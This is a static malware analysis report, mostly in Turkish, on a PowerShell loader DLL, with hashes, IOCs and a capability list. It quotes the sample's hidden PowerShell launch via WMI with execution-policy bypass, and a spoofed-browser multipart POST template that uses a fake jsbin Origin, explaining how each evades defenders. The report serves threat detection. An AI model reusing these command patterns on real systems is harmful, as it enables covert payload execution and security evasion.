Statik Analiz - PowerShell Loader DLL | Tehdit: YUKSEK

Dosya Kimligi

SHA25605c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e
Boyut413,424 byte (PE32 DLL console x86, 6 sections)
Entropi6.832 (normal)
ImagebaseSuspicious

PowerShell Hidden Execution

POWERSHELL DROPPER: Gizli PowerShell komut yurütmesi tespit edildi!
process call create "powershell -executionpolicy bypass -nop -w hidden %s"\n\n-- -executionpolicy bypass: PS yürütme politikasini atla\n-- -nop: profil dosyasi yuklemesini engelle (hizli calistir)\n-- -w hidden: pencere gizli calistir (kullanici gormez)\n-- WMI process call create: WMI araciligi ile proses baslat (AV bypass)\n-- %s: dinamik payload yolu (calisma zamaninda doldurulur)

HTTP Multipart POST + Sahte Tarayici Kimlik

POST %s HTTP/1.0\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/102.0.5005.61\nOrigin: http://null.jsbin.com\nReferer: http://null.jsbin.com/\n------WebKitFormBoundaryYeg3e1XpGtiXfNZD--\n\n-- Sahte macOS + Chrome User-Agent: Mac tarayicisi taklit et\n-- WebKit form boundary: multipart/form-data ile veri yukle\n-- null.jsbin.com: jsbin.com servisinin null origin = sandbox atlatma\n-- .tpp0 / .tpp1 uzantilari: ozel payload/temp dosyalari

IOC

SHA25605c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e
PowerShell-executionpolicy bypass -nop -w hidden (WMI launch)
User-AgentmacOS Chrome 102 camouflage
Originhttp://null.jsbin.com (fake)
File ext.tpp0 / .tpp1 (custom payload extension)

PSLoaderDLL — Malware Profile

PowerShell loader DLL using WMI (process call create) to launch PowerShell with -executionpolicy bypass -nop -w hidden. HTTP multipart POST with macOS Chrome 102 User-Agent camouflage. Fake Origin/Referer: null.jsbin.com. Creates custom .tpp0/.tpp1 files. WebKit form boundary for file uploads.

Malware Type
Loader
Programming Language
C/C++
C2 Protocol
HTTP
Target Systems
Kuresel

Capabilities & Behavior

Payload İndirme
Süreç Enjeksiyonu
Modüler Mimari
Kimlik Bilgisi Hırsızlığı
Yanal Hareket
Kalıcılık
Anti-VM/Sandbox
İkincil Payload Dağıtımı

IOC List (1 indicators)

IOC — PSLoaderDLL
# SHA256 05c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e
TypeValueNote
sha256 05c72e77d14cee079ac94706759dfe77c27fe51731a1eca22b03352190087e9e
Tags
psloaderdllwmi-process-call-create-powershell-executionpowershell-executionpolicy-bypass-nop-w-hiddenhttp-multipart-post-form-uploadmacos-chrome-102-user-agent-camouflagenull-jsbin-com-fake-origin-referertpp0-tpp1-custom-payload-extensionswebkit-form-boundary-multipart-uploadsuspicious-imagebasevirtualAllocExNuma-allocation